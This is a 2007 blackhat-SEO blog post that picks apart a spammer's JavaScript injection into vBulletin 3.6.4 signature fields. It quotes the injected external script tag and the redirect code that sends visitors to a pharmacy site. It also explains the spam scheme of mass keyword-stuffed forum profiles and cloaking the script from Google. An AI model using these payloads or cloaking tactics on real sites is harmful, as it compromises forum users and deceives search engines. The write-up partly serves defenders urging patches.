Slightly Shady SEO | Blackhat is Back, Baby.

So I feel this blog has been lacking the shadiness I do so enjoy lately, so I decided I’d spew out some extra-saucy blackhat stuff. I would like to thank whoever the ONE comment spammer who spams this blog is for inadvertantly pointing this trick out to me, by his total lack of stealth.

I’m aware this is not a new vulnerability, but I was not aware it was in the wild. So here’s some specs.

Preface: I have no idea if this is legal. I have not ever used it, or tested it myself. This is all just picking apart someone else. If you use it(which I do not reccomend), I’m not responsible for whatever nastiness might happen. This is as much for blackhats(who many use it), as it is for whitehats(who perhaps should patch their effin shit).

The Software: VBulletin. The version the injection in question showed up on was 3.6.4, but probably more are vulnerable(earlier). Blatantly unpatched on this server. Oy. And this was on a popular VBulletin forum, Pagerank 5.

The Vulnerability: Javascript Injection into the “Sig” field. Executes when one views the member profile. Possibly when one views a thread.

The Implementation:
I recieved a spam for URL http://forum.xxxxxxxx.com/member.php?u=7918
I clicked it, and was amazingly redirected over to a standard pharmaceutical website. GASP!

The Injection:
It would appear that they set this to be the “sig” of their user profile. Before the actual javascript was a series of relevant words, to bring in search results, and send the users to the URL. Here’s the code though.
<script src=”http://yyyyyyyyyy.info/ss.js”></script>

The Javascript
window.location=(”http://yyyyyyyy.info/in.cgi?12&seoref=”+encodeURIComponent(document.referrer)+ “&meter=$keyword&se=$se&ur=1&HTTP_REFERER=”+encodeURIComponent(document.referrer)+”&default_keyword=phentermine”);

The entire point of the above is just stat taking. It records all the information, and sets the keyword so it know which product to redirect them to. It then just fires them off to his real page.

What is the Point of This?
It’s all about the longtail baby. By putting relevant keywords in the sig/name, he creates a lot of longtail juice. Remember, he’s probably doing this at 20k+ forums. So lets say 30 keywords per sig. 20,000*30=600,000 longtail words relevant to his subject (phentermine). Whenever someone goes to one of these profiles from a search engine, it shoves them over to his site. Little to no risk for his own domains. Really, he doesn’t even NEED to be indexed by Google to get traffic.

How Can one Ever Hope to Rank a Profile?
By spamming out the link to the profile itself, using the username/anchor text of whatever drug he’s spamming that day. When one does that, any search for his drug, plus any of the longtail words, will rank it much higher than it would organically, without any of such promotion.

Why Doesn’t Google Detect This?
He uses external Javascript, which Google does not generally fetch. As an added precaution, most people make it so the Javascript file is cloaked, and shows up as blank for any Google IP that goes to fetch the Javascript.

What Should I do With This?
Patch your DAMN shit.

Don’t You Feel Bad about Calling out a Blackhat?
Nope. I’m not calling him out. I modified ALL urls so they weren’t accessible, and this trick is commonly known. I’d be very surprised if VBulletin didn’t patch this, and quite frankly, I’m surprised it existed in the first place.

Posted on Thursday, November 29th, 2007 at 12:20 pm in the category:Exploits. Comment RSS 2.0 feed. Comment it , or trackback this post.